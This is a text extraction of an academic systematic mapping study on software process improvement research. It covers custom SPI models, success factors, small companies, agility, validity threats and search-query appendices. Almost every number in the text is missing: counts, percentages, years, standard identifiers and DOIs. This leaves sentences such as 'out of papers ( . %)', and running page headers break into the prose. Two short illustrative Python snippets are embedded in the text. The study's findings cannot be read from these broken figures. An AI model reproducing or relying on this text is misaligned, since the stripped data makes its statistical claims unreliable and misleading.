%) aim to improve the test process. that is, the focus of the custom/new spi models is on quality management and testing ( . % in total). summary. the trend observed in our initial study could be confirmed: out of papers propose custom or new spi approaches, which makes in average new spi models published per year. only out of these papers ground their contribution in a standard approach, whereas the majority (approx. %) of the solution proposals does not explicitly rely on standardized approaches. furthermore, the result set shows that the majority of the papers proposing entire spi methods or frameworks of which few are evaluated (the majority are solution proposals). moreover, the result set shows few models or theories on spi among the proposed solutions. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure overview of the classification of publications addressing the standard approaches cmmi and iso/iec (n = ), and their rela- tion to custom/new models (n = ). spi success factors figure visualizes the second trend observed: the quest for spi success factors. in the result set, out of papers (approx. . %) are devoted to success factors. the figure shows this quest starting in the mid s, and an increasing interest starting around . in the following, we provide an overview how success factors are collected, studied, applied, and evaluated. the first questions of interest address the origin and maturity of the success factors, i.e., their general reliability. for this, we analyzed the research- and contribution type facets of the papers containing the success factors. figure provides this categorization and shows that of the papers ( . %) are classified as philosophical papers, i.e., papers that are either a secondary study or that provide a discussion-based research approach. however, papers ( . %) derive their success factors either from evaluation research or experience reports. furthermore, for papers ( . %), success factors are contributed kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure trend chart of the share of papers that investigate success factors in spi. figure summary of papers addressing success factors in spi categorized according the research- and contribution type facets. as lessons learned; papers ( . %) structure and integrate success factors in frameworks, and papers ( . %) use success factors to develop a model or a theory. figure suggests success factors mainly crafted from secondary studies and discussion. in order to provide more insight, we used the study type and method dimension to study the research approaches chosen for the collection of success factors. figure provides the summary of the chosen research methods. the figure shows survey/interview and case study research being the preferred methods. only out of papers rely on secondary studies (systematic reviews and mapping studies), and only four papers use a multi-method research approach (either survey with case study research, or a secondary study combined with survey research and grounded theory). for papers, an explicitly mentioned research approach could not be found in the abstract-based analysis. figure also shows that only papers ( multi-case/longitudinal study, replication study, and multi-method) go beyond ‘‘one-time research’’, i.e., these papers study success factors over time, from different angles, and/or apply them and learn from the application. kuhrmann et al. 
figure summary of the research methods applied to study spi success factors.

figure trend chart of the share of papers on spi in the context of smes.

summary. the second trend observed in our initial study could be confirmed: out of papers are devoted to the collection and study of success factors. the majority of the papers is classified as philosophical papers, i.e., these papers report secondary studies or discussion-based studies, and most of the papers present success factors as lessons learned. however, the data also indicates that success factors are being crafted from limited research in terms of long-term observation or evaluation from different angles. only papers mention a respective research approach. furthermore, out of papers are categorized as secondary studies, i.e., there is an observable trend to foster information collection and aggregation.

spi for smes
the third trend observed in the initial study was an increasing interest in spi for small-to-medium-sized enterprises (sme). figure provides an overview of the share of papers explicitly addressing spi in smes (and other company sizes if mentioned in title, keywords, or abstracts). the figure shows a first ‘‘peak’’ from - (matching the ‘‘dot-com’’ phase), and then a growing interest starting again in and continuing till now. in total, out of papers explicitly mentioned the company size in the context attributes, of which papers ( . %) mention smes (or vses), and another papers ( . %) mention other company sizes; one paper addresses companies regardless of their size. cross-cutting the company size, the metadata also contains an attribute for global software engineering (gse), i.e., whether spi takes place in a global setting. a total of papers address gse-related questions.

figure overview of the classification of publications addressing spi in small and very small companies, and spi in other company sizes (n = ).

in the following, we provide some insights regarding the topics spi for smes addresses, and we also provide an overview of the respective application domains and covered life cycle phases. figure provides a systematic map of the papers that explicitly mention the company context. the figure shows the classification according to the research- and contribution type facet. regarding the research type facet, fig. shows a fairly balanced picture, i.e., we find solution proposals, philosophical papers, evaluation research, and experience papers. regarding the contribution type facet, papers mostly provide frameworks and lessons learned. however, for vses and smes, three papers develop models on spi for smes, two papers develop theories on spi for smes, and nine papers also address tools in the context of spi for smes. to get more insights, we filtered the metadata for the company size. the results are illustrated in tables – . table shows that most of the vse/sme-related papers emerge from the domain of web, mobile, and cloud-based software development. companies categorized as ‘‘other,’’ i.e., large companies and global players, mostly contribute to the body of knowledge from embedded systems and telecommunication. regarding the respective publication objectives, table , again, shows the trend to contribute custom/new spi models, especially for the vse/sme context (cf. ‘new and customized spi models’), and to collect success factors (cf. ‘spi success factors’).
table also shows the interest in agile and lean approaches in the context of spi. as already mentioned in ‘new and customized spi models’, a certain trend shows a particular focus on improving project- and quality management. table reflects this trend also for the company-size context, whereas large companies and global players seemingly address a broader spectrum of life cycle phases.

table overview of spi application domains per company-size group (v/sme vs. other): embedded systems, telecommunication, medical devices, automotive, mission-critical, defense, business is, web/mobile/cloud, and skills and education.

table overview of publication objectives per company-size group (v/sme vs. other): agile/lean, process simulation, process line/patterns, product line/management, success factors, custom model, and general improvement.

table overview of addressed life cycle phases per company-size group (v/sme vs. other): project management, quality management, requirements engineering, architecture, implementation, and test.

summary. among the papers from the result set, explicitly mention the company size as context attribute. in total, papers explicitly mention small and very small companies as research context. almost half of these papers ( papers) address custom/new spi models, which confirms the previously observed trend. in the present result set, we find a growing interest in spi for smes, which is also supported by the recently published standard iso/iec that explicitly addresses spi for small and very small companies (six papers already refer to this new standard).

spi and agility
finally, fig. visualizes the fourth trend found in the initial study: although perceived as a contradiction, in recent years, combining agility and spi has received some attention, for instance in the form of agile maturity models. in total, the result set contains papers ( . %) that address agility in the context of spi, and the figure shows first contributions on this topic just around the agile manifesto’s publication. however, the ‘‘real’’ interest started around , similar to salo & abrahamsson ( ), when the number of studies dealing with agility and spi started to increase.

figure trend chart of the share of papers that investigate the application of agility in spi.

figure overview of the classification of publications addressing agility and spi (n = ).

figure shows the big picture by visualizing the research- and contribution type facets of the papers on agility and spi. the figure shows a balanced picture, i.e., the result set contains solution proposals as well as evaluation research and experience reports, and philosophical papers discussing agility and spi (only two of the philosophical papers are secondary studies). the majority of the papers contributes lessons learned (from applying agile in spi or related activities) and frameworks. analyzing the papers for the collected metadata, papers discuss agility in the context of the standard spi models, i.e., cmmi and iso/iec . furthermore, papers propose custom spi models, of which six papers ground their proposal in cmmi and three papers in iso/iec . papers discuss success factors associated with agility and spi, whereas only one paper develops a model on success factors while of the remaining papers report lessons learned only.
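the trend charts referenced in this and the preceding subsections all plot, per publication year, the share of papers carrying a given attribute (custom/new model, success factors, sme/vse context, agility). a minimal sketch of deriving such a series is given below; the boolean attribute column and the records are illustrative assumptions, not study data.

```python
# sketch: deriving a "share of papers per year" trend line for one attribute.
# the attribute flag and the records are illustrative assumptions.
import pandas as pd

papers = pd.DataFrame([
    (2012, True), (2012, False), (2013, True), (2013, True),
    (2014, False), (2015, True), (2015, False), (2016, True),
], columns=["year", "custom_model"])

# share per year = papers carrying the attribute / all papers of that year;
# the per-group mean of a boolean column is exactly this fraction.
share_per_year = papers.groupby("year")["custom_model"].mean()
print(share_per_year)

# swapping in another boolean column (e.g., success_factors, sme_context,
# agility) yields the other trend lines in the same way.
```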
regarding the company size, nine papers explicitly mention vses and smes as research context and seven papers address other company sizes (mostly in the embedded systems and telecommunication application domain). furthermore, five papers discuss agility in a global software engineering context (three of them in the context large companies). finally, regarding the covered life cycle phases, six papers aim to improve the project management and nine papers address quality management and software test. summary. among the papers from the result set, deal with agility and spi. these papers address a variety of topics showing agility considered relevant for many aspects of software and system development thus becoming interesting for spi, too. the majority of the classified papers deals with agility as concept to improve processes. however, the result set also contains papers adapting agility for spi as such, like agile maturity models kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (e.g., schweigert et al., ) or concepts to justify agility and standard spi models. the result set also shows that agility is not for v/smes only, but also large companies and even global players have a growing interest into agility. discussion in this section, we discuss the findings obtained so far. beyond the discussion of the trends already identified in our initial study, we also broaden our perspective and discuss further trends that can be found in the updated result set. further insights in spi research. beyond the aforementioned major trends, the updated study (including the updated data analysis procedures) reveals more insights but few further trends. at first, the study confirms the statement by horvat, rozman & györkös ( ) that spi is important for all companies regardless of their size, and, we can add, also regardless of their application domain. rationale for this growing interest can be found in new technologies and markets (see also attribute gse in fig. ), and in the evolution of software development methods. for instance, several studies like the ‘‘state of agile survey’’ (versionone, – ) show a growing interest in agile and lean approaches and, at the same time, vijayasarathy & butler ( ) and theocharis et al. ( ) study how this trend is manifested in the companies’ process use. especially theocharis et al. ( ) mention hybrid software processes (or the ‘‘water-scrum-fall’’ as named by west, ) as standard approach. yet, so far, little is known about the (systematic) development of such hybrid processes. this can be considered one reason for the growing interest in spi: companies want/have to adopt agile/lean approaches (e.g., diebold et al., ), but they also have to comply with external norms and standards (e.g., in the domain of safety-critical systems), which we consider a main driver behind spi initiatives. another perspective is given by vses and smes that also have a growing interest in spi. however, for companies of this size, standard approaches, such as cmmi or iso/iec are often inappropriate (see for instance staples et al., ). at this scale, agile/lean is important as well as context-specific spi approaches, which can be considered an explanation for the significant number of custom/new spi models (‘new and customized spi models’) such as lappi (raninen et al., ) or tailored standards, such as iso/iec (laporte & o’connor, ). 
another finding of the study is a strong focus on project management and quality management (often together with testing) in spi. spi is, usually, a management-driven endeavor. as argued in theocharis et al. ( ), managers want to have their ‘‘safe’’ and measurable environment, while developers prefer slim and agile development approaches (see also murphy et al. ( ); tripp & armstrong ( )). this line of argumentation provides rationale for two observations from this study: first, there is a continuous effort in studying measurement in general and, second, the growing interest in agile/lean approaches. both together lead to a number of the aforementioned hybrid software processes and also to context-specific spi approaches that—all together—provide an explanation for the strong focus on project- and (general) quality management. regarding the remaining life cycle phases, requirements engineering and software test are the most frequently researched topics in spi. however, the high number of testing-related papers (compared to the implementation-related papers) motivates the question for why this rather ‘‘late’’ kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. phase is more emphasized, especially in times of agile/lean software development. is testing addressing implementation as well? is testing subject to improvement because of the effort spent on this activity? however, these are questions that cannot be answered in the current stage of the study thus remain subject to future work (see also ‘conclusion & future work’). what is the state of spi after all? our data shows a diverse picture and, furthermore, shows spi a frequently researched topic (fig. ). moreover, research on spi addresses a variety of aspects with certain focus points: the majority of the investigated publications focuses on proposing custom/new frameworks and on reporting lessons learned. furthermore, our results show a significant imbalance between proposing new solutions and evaluating their feasibility—especially in the long run. the majority of evaluation research is conducted in the context of standardized spi- and maturity models (fig. ). for newly proposed models, we often find—if at all—only single-case validation (in industry or university-hosted labs); only few, e.g., raninen et al. ( ) provide a comprehensive evaluation. another finding is the lack of theorizing approaches, which are often performed for specific domains (e.g., smes) or grounded in secondary studies only. in summary, although spi is around for decades, we still miss a sound theory about spi. we have a number of standardized and specific spi models and frameworks. however, we still lack evidence. one reason could be that spi always involves change in behavior of individual persons and changes in the culture of an organization. due to the varying contexts, spi cannot be too descriptive. therefore, frameworks and tools are proposed for adaptation to the respective context. this would also provide an explanation for the effort spent to study spi success factors (‘spi success factors’), which can be considered an early step towards crafting a more general and context-agnostic theory on spi. yet, the constant change or evolution of the context could be considered a continuous stimulus to provide new frameworks that only have a short life cycle and are quickly replaced by other frameworks that aim to ‘‘better’’ solve a particular issue. 
this assumption is supported by the missing long-term and replication studies (the result set only contains explicitly mentioned replication studies). yet, this constant change could also put all attempts to standardize spi at stake. as for instance vijayasarathy & butler ( ) and theocharis et al. ( ) have shown, companies utilize highly customized and specific processes, and the aforementioned diversity could end up in a situation in which every organization implements its own ‘‘home-grown’’ spi approach, leaving only non-binding initiatives, such as the spi manifest (pries-heje & johansen, ) as least common denominator. furthermore, missing is a critical discussion and comparison of available approaches, and their use and feasibility in practice. although we found secondary studies, these studies lay their focus on investigating success factors rather than providing structure and trying to generalize available knowledge, as for instance done by unterkalmsteiner et al. ( ). however, in our study, we found more than papers addressing standard spi approaches, papers presenting/discussing custom/new models, and we also found papers explicitly devoted to spi success factors. all together, these papers provide a rich ground to conduct research on the evolution of spi models, which would help studying the actual essence of spi models, factors that positively/negatively influence the success of kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. spi programs. in a nutshell, our results show that spi is a still emerging field characterized by solution proposals and experiences awaiting more effort to systematization. threats to validity in this section, we evaluate our findings and critically review our study regarding its threats to validity. as a literature study, this study suffers from potential incompleteness of the search results and a general publication bias, i.e., positive results are more likely published than failed attempts. for instance, the result set does not contain studies that explicitly report on failure and draw their conclusions from respective lessons learned, and we thus cannot analyze proposals to answer the question for: what works and what does not? that is, our study encounters the risk to draw an incomplete and potentially too positive picture. internal validity. beyond the aforementioned more general threat, the internal validity of the study could be biased by personal ratings of the participating researchers. to address this risk, we continued our study kuhrmann et al. ( ), which follows a proven procedure kuhrmann, fernández & tiessler ( ) that utilizes different supporting tools and researcher triangulation to support dataset cleaning, study selection, and classification. furthermore, due to the inappropriateness of the focus type facet as classification schema in this stage of the study (as already discussed in kuhrmann et al., ), we addressed this threat to validity by relying on a new, more flexible set of metadata (‘analysis and classification’). this new instrument addresses the previously found issues, namely (general) disagreement on the categorization, and lacking precision and demand for multiple assignments respectively. however, although the issues with the focus type facet were solved, the metadata schema introduces potentially new threats. 
for instance, due to the nature of the study, we cannot ensure to have a full set of metadata for every paper (as already mentioned in ‘rq : result set contribution’, only % of the papers have attributes from all three metadata dimensions assigned and, still, we cannot ensure to have captured all metadata). furthermore, the metadata collected so far needs to be considered initial, as there are potentially more attributes of interest. that is, since we rely on the mapping study instrument in the first place, some metadata might yet not be captured, as this would require a more in-depth analysis, e.g., using the systematic review instrument. furthermore, as we introduced metadata attributes, the risk of misclassification increases, e.g., due to misunderstandings regarding the criteria to be applied or due to confusing/misleading use of terminology in respective papers. external validity. the external validity is threatened by missing knowledge about the generalizability of the results. however, as we focused on a broadband analysis accepting a large number of publications, we assume to have created a generalizable result set. furthermore, due to an extra quality assurance and trend analysis of the two result sets (initial study and study update) and the integrated result set, in ‘result overview’, we could observe a manifesting trend (see figs. – ). yet, this assumption needs to be confirmed by further independently conducted studies. also, the external validity can be threatened by the modified data collection procedure (appendix ‘data collection in the study update’), which includes a potential limitation of the update chunks to be added. however, the kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. aforementioned quality assurance and trend analysis procedures did not show a significant impact on the trends of the distribution of the papers in the result sets. nevertheless, to increase the external validity, further update and/or replication studies are required to confirm our findings. with the study at hand, we lay the foundation for such research by providing an actionable update procedure (appendix ‘search and cleaning procedure’) that can be implemented by further researchers. furthermore, as already mentioned in the discussion on the internal validity, generalizability is also affected by potential white spots in the metadata attributes, which, however, requires further investigation. such (independently conducted) investigation will (i) contribute to the internal validity by increasing dataset completeness, but (ii) will also improve the external validity by incrementally improving the quality of the dataset used to draw general conclusions. conclusion & future work in this article, we presented a substantially updated systematic mapping study on the general state of the art in software process improvement (spi). the present work continues our long-term study of which we published initial results in kuhrmann et al. ( ), and (i) evolves the dataset and the precision of the data analysis and (ii) introduces an improved data collection instrument to serve further studies of the field. to analyze the data obtained from automatic searches, we rely on the research type facet by wieringa et al. ( ) and the contribution type facet by shaw ( ) as standard classification schemas. furthermore, to get deeper insights, we defined metadata attributes. 
in total, our study results in papers that allow for a long-term analysis of the development of spi, and that allow for determining research hot-spots and (general) trends. in particular and based on kuhrmann et al. ( ), our study investigates previously observed trends: a constant publication rate of custom/new spi models, a huge interest into studying spi success factors, and an increasing interest in studying spi in the context of (very) small enterprises and in adopting agile principles and practices to spi. among other things, papers ( %) of the papers propose/discuss custom or new spi approaches (ranging from fully-fledged models to specific fine-grained methods). from these papers, ground their contribution in standard models, such as cmmi or iso/iec , whereas the majority of the papers is based other practices or none of the available approaches. the majority of the custom/new models covers self-contained spi approaches, which are, however, scarcely evaluated in a broader context (the most frequently used instrument to conduct spi research is the single-case study). moreover, the publication pool is focused on solution proposals, yet lacking theories or models of spi. regarding the second trend, papers ( . %) were identified contributing spi success factors. the investigation of how the success factors were distilled showed an increasing trend towards secondary studies. that is, although most of the contributing papers report on rather short-term studies or studies carried out in a university lab (only papers mention a mixed-method or long-term research approach to investigate and evaluate success factors), there is an observable trend to foster information collection and structuring. the third trend kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. is the increasing interest into spi in the context of vses and smes. in the result set, papers ( . %) explicitly address companies of this size of which about the half ( papers) addresses custom/new spi approaches tailored to this particular context. yet, the result set also shows new standards that address this context (e.g., the iso/iec ) represented in the study. the last trend studied addresses agility and spi. the result set mentions papers ( . %) mostly using agility as a concept to improve established processes, but the result set also lists agile maturity models or further concepts to justify agility and standard spi models. the result set also shows that agility is not for vses/smes only, but also large companies and even global players, e.g., from the domain of telecommunications, show a growing interest into agility. finally, going beyond the aforementioned general trends, inspecting the result set shows spi mostly addressing project management and quality management (including measurement), and the result set shows the growing interest into agile/lean approaches. impact. summarizing, our study provides a big picture illustrating the development of the field spi over more than years. our results show a diverse picture, which is shaped by a constant publication rate of about spi solution proposals per annum, and a large share of papers reporting lessons learned. however, our study also shows an imbalance in the publication pool: there are many solution proposals but few are rigorously evaluated. 
furthermore, although spi as a field addresses a variety of topics, on the one hand, our study shows several research hotspots but, on the other hand, we could also identify ‘‘under-researched’’ topics, such as sound theories and models on spi. therefore, our study has some impact on research as well as on practice. from the practitioner perspective, by using the categorized data, our study helps practitioners better characterize an actual/planned spi endeavor and to find proper approaches and experiences straight forward and thus helps avoiding errors already made before or re-inventing the wheel. for researchers, our study provides rich ground to conduct further research, e.g., by highlighting the white spots that need further investigation or by naming those fields that already accumulated a certain amount of data thus enabling researchers to conduct replication research. limitations. although being a long-term endeavor aggregating much knowledge, our study has some limitations. in particular, due to the overall goal of creating the big picture, our study suffers from the mapping study instrument applied. as a mapping study, our study suffers from missing details and, therefore (as discussed in the threats to validity), bears the risk of incomplete or even incorrect data classification. however, to overcome this major limitation, further (independently conducted) research is required to incrementally improve the data. furthermore, the present study is conducted from the perspective of ‘‘pure’’ spi. that is, (very) specific spi approaches in specific domains might not be triggered by the study design. to overcome this limitation, again, further complementing research is required to improve the data quality. future work. addressing the aforementioned limitations of the present study, future work comprises a collection of fine-grained studies for selected aspects. in particular, the study presented here serves as a scoping study to identify certain hotspots, trends, or streams kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. worth further investigation. based on those hotspots, we form data subsets, which we analyze using the systematic review instrument (instead of the mapping study instrument) to conduct in-depth analyses. currently, we called in further external researchers to strengthen the team and to carry out the following in-depth studies on spi in the field of global software engineering (gse; kuhrmann et al., in press), spi in the context of software quality management and testing, agility and spi, and spi barriers and success factors. conducting these studies helps rounding out the big picture and, moreover, to get more details and insights on specific topics of interest. furthermore, by applying the systematic review instrument, we directly address the aforementioned limitation and incrementally improve the data quality. in further iterations of the main study, such improved data is going to be integrated with the main study thus aiding the general improvement of the data and analyses presented here. as the present study is also designed to serve as a continuous measurement of spi’s heartbeat, the next update of the mapping study (including all detailed data obtained by then) is planned for . acknowledgements conducting such a study is a long-term endeavor that so far involved many people. 
we thank michaela tießler, ragna steenweg, daniel méndez fernández for their support in the early stages of this study, in particular in testing the instruments for paper selection and dataset cleaning. furthermore, we owe special thanks to the students of the ‘‘hiwi-pool’’ of the technische universität münchen, who supported us during the initial data collection and dataset completion and cleaning processes, and we also owe special thanks to claudia konopka and peter nellemann, who substantially supported the initial data analysis and reporting. furthermore, we thank the reviewers and participants of the international conference on software and systems process (icssp) for their valuable comments and the inspiring discussion on the initial study results. appendix a. initial study population in the initial study, based on the data collection procedures (described in appendix ‘data collection in the initial study’) and the study selection procedures (described in ‘research design’), we obtained the result set described in table . this dataset is the foundation for kuhrmann et al. ( ), and this result set also lays the foundation for the study update presented in this paper. appendix b. data collection procedures the presented study lays the foundation for a continuous study of the research field of software process improvement (spi). in order to support this long-term study, an efficient study update procedure is an imperative, which mainly affects the data collection procedures. therefore, in this appendix, we give an integrated and detailed view on the data collection procedure as executed in the initial study, and we detail the update procedure used for compiling the report at hand. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table data collection and filtering results (tentative result sets during selection and final result set). step ieee acm springer elsevier wiley iet total step : search (‘query construction’) s and (c orc ) , , s and (c or c ) , , s and (c or c ) , , , , , , s and (c or c ) , , s and (c or c ) , , , , , , s and (c or c ) , , , , s and (c or c ) , s and c , , , step : removing duplicates (‘analysis preparation’) duplicates per database , , , , , , duplicates across all databases , , , step : in-depth filtering (‘filter queries’) applying filters f and f – – , unfiltered – , – – – , result set (search process) , , step : voting (‘analysis preparation’) final result set data collection in the initial study the initial study, inter alia, aimed at creating the baseline to study spi. therefore, the initial study was carried out with a considerable ‘‘manpower’’ that, however, is too costly for a continuous update. in this section, with the purpose of increasing transparency and reproducibility, we present the details of the initial data collection procedure (see also kuhrmann et al., ), before presenting the implemented—and recommended— approach to conduct the study updates in appendix ‘data collection in the study update’. query construction in a series of workshops, we defined the keywords that we are interested in and defined the general search strings in table , which were then validated in several test runs before being used in an automated full-text search in several literature databases. the queries were built based on keyword lists given by the common terminology in the area of software processes and spi. general queries. 
the general search strings s –s were defined according to the relevant topics in spi, e.g., improvement, assessment, measurement, iso/iec , cmmi, quality management, and so forth. due to the expected large number of results, we decided to complement the general search strings with context selectors c and c to limit the search to the domain of interest. finally, we concluded the search strings shown in table . filter queries. because of the full-text search, we expected a variety of publications including some overhead. hence, we defined two filter queries f and f to be applied to the initial result set with the purpose of reducing the result set to the key publications. query kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table search strings used for the database search in the initial study kuhrmann et al. ( ). search string addresses... s (life-cycle or lifecycle or life cycle) and (management or administration or development or description or authoring or deployment) process management: general life cycle s (life-cycle or lifecycle or life cycle) and (design or modeling or modelling or analysis or training) phases of the software process’s life cycle s modeling or modelling or model-based or approach or variant process modeling s optimization or optimisation or customization or customisation or tailoring process customization and tailoring s (measurement or evaluation or approach or variant or improvement) general measurement and improvement s reference model or quality management or evaluation or assessment or audit or cmmi or capability maturity model integration reference models and quality management s scampi or standard cmmi appraisal method for process improvement or spice or iso/iec or psp or personal software process or tsp or team software process reference models and assessment approaches s (feasibility or experience) and (study or report) reported knowledge and empirical research c software process and (software development model or process model) context definition: software processes c spi or software process improvement context definition: spi f (spi or software process improvement) and (approach or practice or management) spi approaches, practices, and spi management f (spi or software process improvement) and report and (feasibility or experience) evaluation research on spi, e.g., studies, reports, etc. f aims at finding all publications in the result set that explicitly present spi approaches and practices, or that address the management of spi. f aims at finding all reports in the context of spi in which feasibility is analyzed or experiences are reported. while the initial search was a full-text search, the filter queries were applied to the abstracts only. however, for technical reasons, acm and springer abstracts were partially not available in the initial result set and, thus, the filtering was done manually during the voting procedure (cf. appendix ‘analysis preparation’). data sources and data format the initial data collection was an automated full-text search in several literature databases. as main data sources, we relied on established literature databases, which we consider most appropriate for a search. in particular, we selected the following databases: acm digital library, springerlink, ieee digital library (xplore), wiley, elsevier (science direct), and iet software. 
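as described under ‘filter queries’ above, f and f were applied to abstracts only in order to reduce the full-text search results to the key publications. the sketch below shows how such abstract-level filtering could be implemented; the boolean structure mirrors the two filter queries, while the function names, the naive substring matching, and the sample abstracts are illustrative assumptions.

```python
# sketch: applying the abstract-level filter queries F1 and F2.
# F1: (spi OR "software process improvement") AND (approach OR practice OR management)
# F2: (spi OR "software process improvement") AND report AND (feasibility OR experience)
# naive substring matching is used for brevity; a real implementation would
# tokenize to avoid matches such as "spiral" counting as "spi".

def mentions_spi(text: str) -> bool:
    return "spi" in text or "software process improvement" in text

def matches_f1(abstract: str) -> bool:
    text = abstract.lower()
    return mentions_spi(text) and any(
        term in text for term in ("approach", "practice", "management"))

def matches_f2(abstract: str) -> bool:
    text = abstract.lower()
    return (mentions_spi(text) and "report" in text
            and ("feasibility" in text or "experience" in text))

abstracts = {  # illustrative sample abstracts, not study data
    "paper a": "We report experiences from a software process improvement initiative.",
    "paper b": "A model-based testing approach for embedded systems.",
}
kept = [title for title, text in abstracts.items()
        if matches_f1(text) or matches_f2(text)]
print(kept)  # papers retained for the subsequent voting procedure
```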
if there was a paper listed in one of those databases, but was only referred, we counted it for the database that generated the item, regardless of the actual publication location. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. we used the word clouds to visually inspect the result set for ‘‘intruders,’’ e.g., medicine, chemistry, and cancer therapy. terms not matching our search criteria were collected and used to identify and remove the misselected papers from the result set. please note: as our initial study resulted in a comprehensive microsoft excel spreadsheet, we also tailor the search and cleaning procedures to this tool. if you utilize a different tool, changes in the procedure might be necessary. analysis preparation we performed an automated search that required us to filter and prepare the result set. the data analysis is prepared by harmonizing the data and performing a -staged voting process. harmonization. due to the query construction, we found a vast amount of multiple occurrences in the result set, and we also found a number of publications that are not in software engineering or computer science. to make the selection of the contributions more efficient, we first cleaned the initial result set (cf. table for the results per phase). in the first step, we removed the duplicates, which we identified by title, year, and author list. in the second step, we applied the filter queries to sort out those publications not devoted to software processes and spi. to double-check the result set, we used word clouds generated from abstracts and keyword lists to validate if the result set meets our requirements. this procedure was performed individually per database and again on the integrated result set. finally, we completed missing data to prepare the voting procedure. voting the papers. the final selection whether or not a paper was included in the result set was made using a multi-staged voting procedure. this procedure was also applied in the study update and, therefore, is described in detail in ‘analysis preparation’. data collection in the study update in this section, we present the details about the recommended data collection procedure to be implemented for study updates. search queries the major update in the search procedure is the search engine utilized for the search. instead of repeating the search with individual databases (cf. appendix ‘data sources and data format’), we switched to scopus, as scopus as meta-search engine covers most of the relevant software engineering venues (journals as well as conferences). this however changes the general search procedure, notably the search strings need to be updated accordingly. the adapted search strings are summarized in table . comparing the new search queries to the initial study’s queries from table , it becomes obvious that the context selectors and filter queries are now integrated with the search strings. we tested the new search queries several times on subsets of the initial study before executed them to carry out the actual data collection. search and cleaning procedure changing the search engine also affects the cleaning procedures thus requiring an updated cleaning and filtering approach. to apply the new search strings to a scopus search, to clean the data, and to initiate the study selection, the following procedure needs to be applied: . 
insert the search strings s –s separately and use the time-range, i.e., conduct individual searches for the required time slot of the update. . set the automatic exclusion in scopus using exclusion criterion ec (table ) to: ‘‘subject areas’’ = computer science, engineering or multiple . set the automatic exclusion in scopus using exclusion criterion ec (table ) to: ‘‘language’’ = only english kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table final search strings used for the automatic database search in the study update procedure. search string s ((life-cycle or lifecycle or ‘‘life cycle’’) and (management or administration or development or description or authoring or deployment)) and ((‘‘software process’’ and (‘‘software development model’’ or ‘‘process model’’)) or (spi or ‘‘software process improvement’’)) s (modeling or modelling or model-based or approach or variant) and ((‘‘software process’’ and (‘‘software development model’’ or ‘‘process model’’)) or (spi or ‘‘software process improvement’’)) s (optimization or optimisation or customization or customisation or tailoring) and ((‘‘software process’’ and (‘‘software de- velopment model’’ or ‘‘process model’’)) or (spi or ‘‘software process improvement’’)) s (‘‘reference model’’ or ‘‘quality management’’ or evaluation or (assessment or audit) or (cmmi or ‘‘capability maturity model integration’’)) and ((‘‘software process’’ and (‘‘software development model’’ or ‘‘process model’’)) or (spi or ‘‘soft- ware process improvement’’)) s ((feasibility or experience) and (study or report)) and (spi or ‘‘software process improvement’’) s ((life-cycle or lifecycle or ‘‘life cycle’’) and (design or modeling or modelling or analysis or training)) and ((‘‘software pro- cess’’ and (‘‘software development model’’ or ‘‘process model’’)) or (spi or ‘‘software process improvement’’)) s (measurement or evaluation or approach or variant or improvement) and ((‘‘software process’’ and (‘‘software develop- ment model’’ or ‘‘process model’’)) or (spi or ‘‘software process improvement’’)) s ((scampi or ‘‘standard cmmi appraisal method for process improvement’’) or (spice or ‘‘iso/iec ’’) or (psp or ‘‘personal software process’’) or (tsp or ‘‘team software process’’)) and ((‘‘software process’’ and (‘‘software development model’’ or ‘‘process model’’)) or (spi or ‘‘software process improvement’’)) . export all search results into one microsoft excel file. . eliminate duplicates (ec , table ) applying the duplicate elimination function in microsoft excel to the paper title (double-check and confirm by also checking authors and abstract). . conduct the study selection procedures based on the inclusion and exclusion criteria listed in table following the procedure description in ‘analysis procedures’. additional information and declarations funding philipp diebold’s activities in this study were partially conducted in a software campus project funded by the german ministry of education and research (bmbf is ). marco kuhrmann and jürgen münch received no funding for this work. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: german ministry of education and research: bmbf is . competing interests the authors declare there are no competing interests. kuhrmann et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com http://dx.doi.org/ . /peerj-cs. author contributions • marco kuhrmann and philipp diebold conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables. • jürgen münch conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the raw data has been supplied as data s . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references allison i. . organizational factors shaping software process improvement in small- medium sized software teams: a multi-case analysis. in: international conference on the quality of information and communications technology. piscataway: ieee, – . baddoo n, hall t. . de-motivators for software process improvement: an analysis of practitioners’ views. journal of systems and software ( ): – doi . /s - ( ) - . bayona-oré s, calvo-manzano j, cuevas g, san-feliu t. . critical success factors taxonomy for software process deployment. software quality journal ( ): – doi . /s - - -y. brodman jg, johnson dl. . what small businesses and small organizations say about the cmm. in: international conference on software engineering. piscataway: ieee, – . coleman g, o’connor r. . investigating software process in practice: a grounded theory perspective. journal of systems and software ( ): – doi . /j.jss. . . . diebold p, ostberg j-p, wagner s, zendler u. . what do practitioners vary in using scrum? in: international conference xp. berlin heidelberg: springer, – . dybå t. . an instrument for measuring the key factors of success in software process improvement. empirical software engineering ( ): – doi 